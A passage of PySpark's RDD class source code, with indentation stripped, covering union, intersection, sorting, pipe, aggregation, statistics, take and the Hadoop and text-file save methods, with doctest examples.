rdd = RDD(self._jrdd.union(other._jrdd), self.ctx,
self._jrdd_deserializer)
else:
# These RDDs contain data in different serialized formats, so we
# must normalize them to the default serializer.
self_copy = self._reserialize()
other_copy = other._reserialize()
rdd = RDD(self_copy._jrdd.union(other_copy._jrdd), self.ctx,
self.ctx.serializer)
if (self.partitioner == other.partitioner and
self.getNumPartitions() == rdd.getNumPartitions()):
rdd.partitioner = self.partitioner
return rdd
def intersection(self, other):
"""
Return the intersection of this RDD and another one. The output will
not contain any duplicate elements, even if the input RDDs did.
.. note:: This method performs a shuffle internally.
>>> rdd1 = sc.parallelize([1, 10, 2, 3, 4, 5])
>>> rdd2 = sc.parallelize([1, 6, 2, 3, 7, 8])
>>> rdd1.intersection(rdd2).collect()
[1, 2, 3]
"""
return self.map(lambda v: (v, None)) \
.cogroup(other.map(lambda v: (v, None))) \
.filter(lambda k_vs: all(k_vs[1])) \
.keys()
def _reserialize(self, serializer=None):
serializer = serializer or self.ctx.serializer
if self._jrdd_deserializer != serializer:
self = self.map(lambda x: x, preservesPartitioning=True)
self._jrdd_deserializer = serializer
return self
def __add__(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> (rdd + rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if not isinstance(other, RDD):
raise TypeError
return self.union(other)
def repartitionAndSortWithinPartitions(self, numPartitions=None, partitionFunc=portable_hash,
ascending=True, keyfunc=lambda x: x):
"""
Repartition the RDD according to the given partitioner and, within each resulting partition,
sort records by their keys.
>>> rdd = sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)])
>>> rdd2 = rdd.repartitionAndSortWithinPartitions(2, lambda x: x % 2, 2)
>>> rdd2.glom().collect()
[[(0, 5), (0, 8), (2, 6)], [(1, 3), (3, 8), (3, 8)]]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda k_v: keyfunc(k_v[0]), reverse=(not ascending)))
return self.partitionBy(numPartitions, partitionFunc).mapPartitions(sortPartition, True)
def sortByKey(self, ascending=True, numPartitions=None, keyfunc=lambda x: x):
"""
Sorts this RDD, which is assumed to consist of (key, value) pairs.
# noqa
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortByKey().first()
('1', 3)
>>> sc.parallelize(tmp).sortByKey(True, 1).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortByKey(True, 2).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> tmp2 = [('Mary', 1), ('had', 2), ('a', 3), ('little', 4), ('lamb', 5)]
>>> tmp2.extend([('whose', 6), ('fleece', 7), ('was', 8), ('white', 9)])
>>> sc.parallelize(tmp2).sortByKey(True, 3, keyfunc=lambda k: k.lower()).collect()
[('a', 3), ('fleece', 7), ('had', 2), ('lamb', 5),...('white', 9), ('whose', 6)]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = self._memory_limit()
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda kv: keyfunc(kv[0]), reverse=(not ascending)))
if numPartitions == 1:
if self.getNumPartitions() > 1:
self = self.coalesce(1)
return self.mapPartitions(sortPartition, True)
# first compute the boundary of each part via sampling: we want to partition
# the key-space into bins such that the bins have roughly the same
# number of (key, value) pairs falling into them
rddSize = self.count()
if not rddSize:
return self # empty RDD
maxSampleSize = numPartitions * 20.0 # constant from Spark's RangePartitioner
fraction = min(maxSampleSize / max(rddSize, 1), 1.0)
samples = self.sample(False, fraction, 1).map(lambda kv: kv[0]).collect()
samples = sorted(samples, key=keyfunc)
# we have numPartitions many parts but one of the them has
# an implicit boundary
bounds = [samples[int(len(samples) * (i + 1) / numPartitions)]
for i in range(0, numPartitions - 1)]
def rangePartitioner(k):
p = bisect.bisect_left(bounds, keyfunc(k))
if ascending:
return p
else:
return numPartitions - 1 - p
return self.partitionBy(numPartitions, rangePartitioner).mapPartitions(sortPartition, True)
def sortBy(self, keyfunc, ascending=True, numPartitions=None):
"""
Sorts this RDD by the given keyfunc
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[0]).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[1]).collect()
[('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
"""
return self.keyBy(keyfunc).sortByKey(ascending, numPartitions).values()
def glom(self):
"""
Return an RDD created by coalescing all elements within each partition
into a list.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> sorted(rdd.glom().collect())
[[1, 2], [3, 4]]
"""
def func(iterator):
yield list(iterator)
return self.mapPartitions(func)
def cartesian(self, other):
"""
Return the Cartesian product of this RDD and another one, that is, the
RDD of all pairs of elements C{(a, b)} where C{a} is in C{self} and
C{b} is in C{other}.
>>> rdd = sc.parallelize([1, 2])
>>> sorted(rdd.cartesian(rdd).collect())
[(1, 1), (1, 2), (2, 1), (2, 2)]
"""
# Due to batching, we can't use the Java cartesian method.
deserializer = CartesianDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(self._jrdd.cartesian(other._jrdd), self.ctx, deserializer)
def groupBy(self, f, numPartitions=None, partitionFunc=portable_hash):
"""
Return an RDD of grouped items.
>>> rdd = sc.parallelize([1, 1, 2, 3, 5, 8])
>>> result = rdd.groupBy(lambda x: x % 2).collect()
>>> sorted([(x, sorted(y)) for (x, y) in result])
[(0, [2, 8]), (1, [1, 1, 3, 5])]
"""
return self.map(lambda x: (f(x), x)).groupByKey(numPartitions, partitionFunc)
@ignore_unicode_prefix
def pipe(self, command, env=None, checkCode=False):
"""
Return an RDD created by piping elements to a forked external process.
>>> sc.parallelize(['1', '2', '', '3']).pipe('cat').collect()
[u'1', u'2', u'', u'3']
:param checkCode: whether or not to check the return value of the shell command.
"""
if env is None:
env = dict()
def func(iterator):
pipe = Popen(
shlex.split(command), env=env, stdin=PIPE, stdout=PIPE)
def pipe_objs(out):
for obj in iterator:
s = str(obj).rstrip('\n') + '\n'
out.write(s.encode('utf-8'))
out.close()
Thread(target=pipe_objs, args=[pipe.stdin]).start()
def check_return_code():
pipe.wait()
if checkCode and pipe.returncode:
raise Exception("Pipe function `%s' exited "
"with error code %d" % (command, pipe.returncode))
else:
for i in range(0):
yield i
return (x.rstrip(b'\n').decode('utf-8') for x in
chain(iter(pipe.stdout.readline, b''), check_return_code()))
return self.mapPartitions(func)
def foreach(self, f):
"""
Applies a function to all elements of this RDD.
>>> def f(x): print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreach(f)
"""
def processPartition(iterator):
for x in iterator:
f(x)
return iter([])
self.mapPartitions(processPartition).count() # Force evaluation
def foreachPartition(self, f):
"""
Applies a function to each partition of this RDD.
>>> def f(iterator):
... for x in iterator:
... print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreachPartition(f)
"""
def func(it):
r = f(it)
try:
return iter(r)
except TypeError:
return iter([])
self.mapPartitions(func).count() # Force evaluation
def collect(self):
"""
Return a list that contains all of the elements in this RDD.
.. note:: This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
"""
with SCCallSiteSync(self.context) as css:
port = self.ctx._jvm.PythonRDD.collectAndServe(self._jrdd.rdd())
return list(_load_from_socket(port, self._jrdd_deserializer))
def reduce(self, f):
"""
Reduces the elements of this RDD using the specified commutative and
associative binary operator. Currently reduces partitions locally.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).reduce(add)
15
>>> sc.parallelize((2 for _ in range(10))).map(lambda x: 1).cache().reduce(add)
10
>>> sc.parallelize([]).reduce(add)
Traceback (most recent call last):
...
ValueError: Can not reduce() empty RDD
"""
def func(iterator):
iterator = iter(iterator)
try:
initial = next(iterator)
except StopIteration:
return
yield reduce(f, iterator, initial)
vals = self.mapPartitions(func).collect()
if vals:
return reduce(f, vals)
raise ValueError("Can not reduce() empty RDD")
def treeReduce(self, f, depth=2):
"""
Reduces the elements of this RDD in a multi-level tree pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeReduce(add)
-5
>>> rdd.treeReduce(add, 1)
-5
>>> rdd.treeReduce(add, 2)
-5
>>> rdd.treeReduce(add, 5)
-5
>>> rdd.treeReduce(add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
zeroValue = None, True # Use the second entry to indicate whether this is a dummy value.
def op(x, y):
if x[1]:
return y
elif y[1]:
return x
else:
return f(x[0], y[0]), False
reduced = self.map(lambda x: (x, False)).treeAggregate(zeroValue, op, op, depth)
if reduced[1]:
raise ValueError("Cannot reduce empty RDD.")
return reduced[0]
def fold(self, zeroValue, op):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given associative function and a neutral "zero value."
The function C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
This behaves somewhat differently from fold operations implemented
for non-distributed collections in functional languages like Scala.
This fold operation may be applied to partitions individually, and then
fold those results into the final result, rather than apply the fold
to each element sequentially in some defined ordering. For functions
that are not commutative, the result may differ from that of a fold
applied to a non-distributed collection.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).fold(0, add)
15
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = op(acc, obj)
yield acc
# collecting result of mapPartitions here ensures that the copy of
# zeroValue provided to each partition is unique from the one provided
# to the final reduce call
vals = self.mapPartitions(func).collect()
return reduce(op, vals, zeroValue)
def aggregate(self, zeroValue, seqOp, combOp):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given combine functions and a neutral "zero
value."
The functions C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
The first function (seqOp) can return a different result type, U, than
the type of this RDD. Thus, we need one operation for merging a T into
an U and one operation for merging two U
>>> seqOp = (lambda x, y: (x[0] + y, x[1] + 1))
>>> combOp = (lambda x, y: (x[0] + y[0], x[1] + y[1]))
>>> sc.parallelize([1, 2, 3, 4]).aggregate((0, 0), seqOp, combOp)
(10, 4)
>>> sc.parallelize([]).aggregate((0, 0), seqOp, combOp)
(0, 0)
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
# collecting result of mapPartitions here ensures that the copy of
# zeroValue provided to each partition is unique from the one provided
# to the final reduce call
vals = self.mapPartitions(func).collect()
return reduce(combOp, vals, zeroValue)
def treeAggregate(self, zeroValue, seqOp, combOp, depth=2):
"""
Aggregates the elements of this RDD in a multi-level tree
pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeAggregate(0, add, add)
-5
>>> rdd.treeAggregate(0, add, add, 1)
-5
>>> rdd.treeAggregate(0, add, add, 2)
-5
>>> rdd.treeAggregate(0, add, add, 5)
-5
>>> rdd.treeAggregate(0, add, add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
if self.getNumPartitions() == 0:
return zeroValue
def aggregatePartition(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
partiallyAggregated = self.mapPartitions(aggregatePartition)
numPartitions = partiallyAggregated.getNumPartitions()
scale = max(int(ceil(pow(numPartitions, 1.0 / depth))), 2)
# If creating an extra level doesn't help reduce the wall-clock time, we stop the tree
# aggregation.
while numPartitions > scale + numPartitions / scale:
numPartitions /= scale
curNumPartitions = int(numPartitions)
def mapPartition(i, iterator):
for obj in iterator:
yield (i % curNumPartitions, obj)
partiallyAggregated = partiallyAggregated \
.mapPartitionsWithIndex(mapPartition) \
.reduceByKey(combOp, curNumPartitions) \
.values()
return partiallyAggregated.reduce(combOp)
def max(self, key=None):
"""
Find the maximum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([1.0, 5.0, 43.0, 10.0])
>>> rdd.max()
43.0
>>> rdd.max(key=str)
5.0
"""
if key is None:
return self.reduce(max)
return self.reduce(lambda a, b: max(a, b, key=key))
def min(self, key=None):
"""
Find the minimum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([2.0, 5.0, 43.0, 10.0])
>>> rdd.min()
2.0
>>> rdd.min(key=str)
10.0
"""
if key is None:
return self.reduce(min)
return self.reduce(lambda a, b: min(a, b, key=key))
def sum(self):
"""
Add up the elements in this RDD.
>>> sc.parallelize([1.0, 2.0, 3.0]).sum()
6.0
"""
return self.mapPartitions(lambda x: [sum(x)]).fold(0, operator.add)
def count(self):
"""
Return the number of elements in this RDD.
>>> sc.parallelize([2, 3, 4]).count()
3
"""
return self.mapPartitions(lambda i: [sum(1 for _ in i)]).sum()
def stats(self):
"""
Return a L{StatCounter} object that captures the mean, variance
and count of the RDD's elements in one operation.
"""
def redFunc(left_counter, right_counter):
return left_counter.mergeStats(right_counter)
return self.mapPartitions(lambda i: [StatCounter(i)]).reduce(redFunc)
def histogram(self, buckets):
"""
Compute a histogram using the provided buckets. The buckets
are all open to the right except for the last which is closed.
e.g. [1,10,20,50] means the buckets are [1,10) [10,20) [20,50],
which means 1<=x<10, 10<=x<20, 20<=x<=50. And on the input of 1
and 50 we would have a histogram of 1,0,1.
If your histogram is evenly spaced (e.g. [0, 10, 20, 30]),
this can be switched from an O(log n) inseration to O(1) per
element (where n is the number of buckets).
Buckets must be sorted, not contain any duplicates, and have
at least two elements.
If `buckets` is a number, it will generate buckets which are
evenly spaced between the minimum and maximum of the RDD. For
example, if the min value is 0 and the max is 100, given `buckets`
as 2, the resulting buckets will be [0,50) [50,100]. `buckets` must
be at least 1. An exception is raised if the RDD contains infinity.
If the elements in the RDD do not vary (max == min), a single bucket
will be used.
The return value is a tuple of buckets and histogram.
>>> rdd = sc.parallelize(range(51))
>>> rdd.histogram(2)
([0, 25, 50], [25, 26])
>>> rdd.histogram([0, 5, 25, 50])
([0, 5, 25, 50], [5, 20, 26])
>>> rdd.histogram([0, 15, 30, 45, 60]) # evenly spaced buckets
([0, 15, 30, 45, 60], [15, 15, 15, 6])
>>> rdd = sc.parallelize(["ab", "ac", "b", "bd", "ef"])
>>> rdd.histogram(("a", "b", "c"))
(('a', 'b', 'c'), [2, 2])
"""
if isinstance(buckets, int):
if buckets < 1:
raise ValueError("number of buckets must be >= 1")
# filter out non-comparable elements
def comparable(x):
if x is None:
return False
if type(x) is float and isnan(x):
return False
return True
filtered = self.filter(comparable)
# faster than stats()
def minmax(a, b):
return min(a[0], b[0]), max(a[1], b[1])
try:
minv, maxv = filtered.map(lambda x: (x, x)).reduce(minmax)
except TypeError as e:
if " empty " in str(e):
raise ValueError("can not generate buckets from empty RDD")
raise
if minv == maxv or buckets == 1:
return [minv, maxv], [filtered.count()]
try:
inc = (maxv - minv) / buckets
except TypeError:
raise TypeError("Can not generate buckets with non-number in RDD")
if isinf(inc):
raise ValueError("Can not generate buckets with infinite value")
# keep them as integer if possible
inc = int(inc)
if inc * buckets != maxv - minv:
inc = (maxv - minv) * 1.0 / buckets
buckets = [i * inc + minv for i in range(buckets)]
buckets.append(maxv) # fix accumulated error
even = True
elif isinstance(buckets, (list, tuple)):
if len(buckets) < 2:
raise ValueError("buckets should have more than one value")
if any(i is None or isinstance(i, float) and isnan(i) for i in buckets):
raise ValueError("can not have None or NaN in buckets")
if sorted(buckets) != list(buckets):
raise ValueError("buckets should be sorted")
if len(set(buckets)) != len(buckets):
raise ValueError("buckets should not contain duplicated values")
minv = buckets[0]
maxv = buckets[-1]
even = False
inc = None
try:
steps = [buckets[i + 1] - buckets[i] for i in range(len(buckets) - 1)]
except TypeError:
pass # objects in buckets do not support '-'
else:
if max(steps) - min(steps) < 1e-10: # handle precision errors
even = True
inc = (maxv - minv) / (len(buckets) - 1)
else:
raise TypeError("buckets should be a list or tuple or number(int or long)")
def histogram(iterator):
counters = [0] * len(buckets)
for i in iterator:
if i is None or (type(i) is float and isnan(i)) or i > maxv or i < minv:
continue
t = (int((i - minv) / inc) if even
else bisect.bisect_right(buckets, i) - 1)
counters[t] += 1
# add last two together
last = counters.pop()
counters[-1] += last
return [counters]
def mergeCounters(a, b):
return [i + j for i, j in zip(a, b)]
return buckets, self.mapPartitions(histogram).reduce(mergeCounters)
def mean(self):
"""
Compute the mean of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).mean()
2.0
"""
return self.stats().mean()
def variance(self):
"""
Compute the variance of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).variance()
0.666...
"""
return self.stats().variance()
def stdev(self):
"""
Compute the standard deviation of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).stdev()
0.816...
"""
return self.stats().stdev()
def sampleStdev(self):
"""
Compute the sample standard deviation of this RDD's elements (which
corrects for bias in estimating the standard deviation by dividing by
N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleStdev()
1.0
"""
return self.stats().sampleStdev()
def sampleVariance(self):
"""
Compute the sample variance of this RDD's elements (which corrects
for bias in estimating the variance by dividing by N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleVariance()
1.0
"""
return self.stats().sampleVariance()
def countByValue(self):
"""
Return the count of each unique value in this RDD as a dictionary of
(value, count) pairs.
>>> sorted(sc.parallelize([1, 2, 1, 2, 2], 2).countByValue().items())
[(1, 2), (2, 3)]
"""
def countPartition(iterator):
counts = defaultdict(int)
for obj in iterator:
counts[obj] += 1
yield counts
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] += v
return m1
return self.mapPartitions(countPartition).reduce(mergeMaps)
def top(self, num, key=None):
"""
Get the top N elements from an RDD.
.. note:: This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
.. note:: It returns the list sorted in descending order.
>>> sc.parallelize([10, 4, 2, 12, 3]).top(1)
[12]
>>> sc.parallelize([2, 3, 4, 5, 6], 2).top(2)
[6, 5]
>>> sc.parallelize([10, 4, 2, 12, 3]).top(3, key=str)
[4, 3, 2]
"""
def topIterator(iterator):
yield heapq.nlargest(num, iterator, key=key)
def merge(a, b):
return heapq.nlargest(num, a + b, key=key)
return self.mapPartitions(topIterator).reduce(merge)
def takeOrdered(self, num, key=None):
"""
Get the N elements from an RDD ordered in ascending order or as
specified by the optional key function.
.. note:: this method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7]).takeOrdered(6)
[1, 2, 3, 4, 5, 6]
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7], 2).takeOrdered(6, key=lambda x: -x)
[10, 9, 7, 6, 5, 4]
"""
def merge(a, b):
return heapq.nsmallest(num, a + b, key)
return self.mapPartitions(lambda it: [heapq.nsmallest(num, it, key)]).reduce(merge)
def take(self, num):
"""
Take the first num elements of the RDD.
It works by first scanning one partition, and use the results from
that partition to estimate the number of additional partitions needed
to satisfy the limit.
Translated from the Scala implementation in RDD#take().
.. note:: this method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> sc.parallelize([2, 3, 4, 5, 6]).cache().take(2)
[2, 3]
>>> sc.parallelize([2, 3, 4, 5, 6]).take(10)
[2, 3, 4, 5, 6]
>>> sc.parallelize(range(100), 100).filter(lambda x: x > 90).take(3)
[91, 92, 93]
"""
items = []
totalParts = self.getNumPartitions()
partsScanned = 0
while len(items) < num and partsScanned < totalParts:
# The number of partitions to try in this iteration.
# It is ok for this number to be greater than totalParts because
# we actually cap it at totalParts in runJob.
numPartsToTry = 1
if partsScanned > 0:
# If we didn't find any rows after the previous iteration,
# quadruple and retry. Otherwise, interpolate the number of
# partitions we need to try, but overestimate it by 50%.
# We also cap the estimation in the end.
if len(items) == 0:
numPartsToTry = partsScanned * 4
else:
# the first paramter of max is >=1 whenever partsScanned >= 2
numPartsToTry = int(1.5 * num * partsScanned / len(items)) - partsScanned
numPartsToTry = min(max(numPartsToTry, 1), partsScanned * 4)
left = num - len(items)
def takeUpToNumLeft(iterator):
iterator = iter(iterator)
taken = 0
while taken < left:
yield next(iterator)
taken += 1
p = range(partsScanned, min(partsScanned + numPartsToTry, totalParts))
res = self.context.runJob(self, takeUpToNumLeft, p)
items += res
partsScanned += numPartsToTry
return items[:num]
def first(self):
"""
Return the first element in this RDD.
>>> sc.parallelize([2, 3, 4]).first()
2
>>> sc.parallelize([]).first()
Traceback (most recent call last):
...
ValueError: RDD is empty
"""
rs = self.take(1)
if rs:
return rs[0]
raise ValueError("RDD is empty")
def isEmpty(self):
"""
Returns true if and only if the RDD contains no elements at all.
.. note:: an RDD may be empty even when it has at least 1 partition.
>>> sc.parallelize([]).isEmpty()
True
>>> sc.parallelize([1]).isEmpty()
False
"""
return self.getNumPartitions() == 0 or len(self.take(1)) == 0
def saveAsNewAPIHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, True)
def saveAsNewAPIHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop job configuration, passed in as a dict (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsNewAPIHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter, jconf)
def saveAsHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, False)
def saveAsHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None,
compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapred.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: (None by default)
:param compressionCodecClass: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter,
jconf, compressionCodecClass)
def saveAsSequenceFile(self, path, compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the L{org.apache.hadoop.io.Writable} types that we convert from the
RDD's key and value types. The mechanism is as follows:
1. Pyrolite is used to convert pickled Python RDD into RDD of Java objects.
2. Keys and values of this Java RDD are converted to Writables and written out.
:param path: path to sequence file
:param compressionCodecClass: (None by default)
"""
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsSequenceFile(pickledRDD._jrdd, True,
path, compressionCodecClass)
def saveAsPickleFile(self, path, batchSize=10):
"""
Save this RDD as a SequenceFile of serialized objects. The serializer
used is L{pyspark.serializers.PickleSerializer}, default batch size
is 10.
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
>>> sc.parallelize([1, 2, 'spark', 'rdd']).saveAsPickleFile(tmpFile.name, 3)
>>> sorted(sc.pickleFile(tmpFile.name, 5).map(str).collect())
['1', '2', 'rdd', 'spark']
"""
if batchSize == 0:
ser = AutoBatchedSerializer(PickleSerializer())
else:
ser = BatchedSerializer(PickleSerializer(), batchSize)
self._reserialize(ser)._jrdd.saveAsObjectFile(path)
@ignore_unicode_prefix
def saveAsTextFile(self, path, compressionCodecClass=None):
"""
Save this RDD as a text file, using string representations of elements.
@param path: path to text file
@param compressionCodecClass: (None by default) string i.e.
"org.apache.hadoop.io.compress.GzipCodec"
>>> tempFile = NamedTemporaryFile(delete=True)
>>> tempFile.close()
>>> sc.parallelize(range(10)).saveAsTextFile(tempFile.name)
>>> from fileinput import input
>>> from glob import glob
>>> ''.join(sorted(input(glob(tempFile.name + "/part-0000*"))))
'0\\n1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n'
Empty lines are tolerated when saving to text files.
>>> tempFile2 = NamedTemporaryFile(delete=True)
>>> tempFile2.close()
>>> sc.parallelize(['', 'foo', '', 'bar', '']).saveAsTextFile(tempFile2.name)
>>> ''.join(sorted(input(glob(tempFile2.name + "/part-0000*"))))
'\\n\\n\\nbar\\nfoo\\n'
Using compressionCodecClass
>>> tempFile3 = NamedTemporaryFile(delete=True)
>>> tempFile3.close()
>>> codec = "org.apache.hadoop.io.compress.GzipCodec"
>>> sc.parallelize(['foo', 'bar']).saveAsTextFile(tempFile3.name, codec)
>>> from fileinput import input, hook_compressed
>>> result = sorted(input(glob(tempFile3.name + "/part*.gz"), openhook=hook_compressed))
>>> b''.join(result).decode('utf-8')
u'bar\\nfoo\\n'
"""
def func(split, iterator):
for x in iterator:
if not isinstance(x, (unicode, bytes)):
x = unicode(x)
if isinstance(x, unicode):
x = x.encode("utf-8")
yield x
keyed = self.mapPartitionsWithIndex(func)
keyed._bypass_serializer = True
if compressionCodecClass:
compressionCodec = self.ctx._jvm.java.lang.Class.forName(compressionCodecClass)
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path, compressionCodec)
else:
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path)
# Pair functions
def collectAsMap(self):
"""
Return the key-value pairs in this RDD to the master as a dictionary.
.. note:: this method should only be used if the resulting data is expected
to be small, as all the data is loaded into the driver's memory.
>>> m = sc.parallelize([(1, 2), (3, 4)]).collectAsMap()
>>> m[1]
2
>>> m[3]
4
"""
return dict(self.collect())
def keys(self):
"""
Return an RDD with the keys of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).keys()
>>> m.collect()
[1, 3]
"""
return self.map(lambda x: x[0])
def values(self):
"""
Return an RDD with the values of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).values()
>>> m.collect()
[2, 4]
"""
return self.map(lambda x: x[1])
def reduceByKey(self, func, numPartitions=None, partitionFunc=portable_hash):
"""
Merge the values for each key using an associative and commutative reduce function.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
Output will be partitioned with C{numPartitions} partitions, or
the default parallelism level if C{numPartitions} is not specified.
Default partitioner is hash-partition.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKey(add).collect())
[('a', 2), ('b', 1)]
"""
return self.combineByKey(lambda x: x, func, func, numPartitions, partitionFunc)
def reduceByKeyLocally(self, func):
"""
Merge the values for each key using an associative and commutative reduce function, but
return the results immediately to the master as a dictionary.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
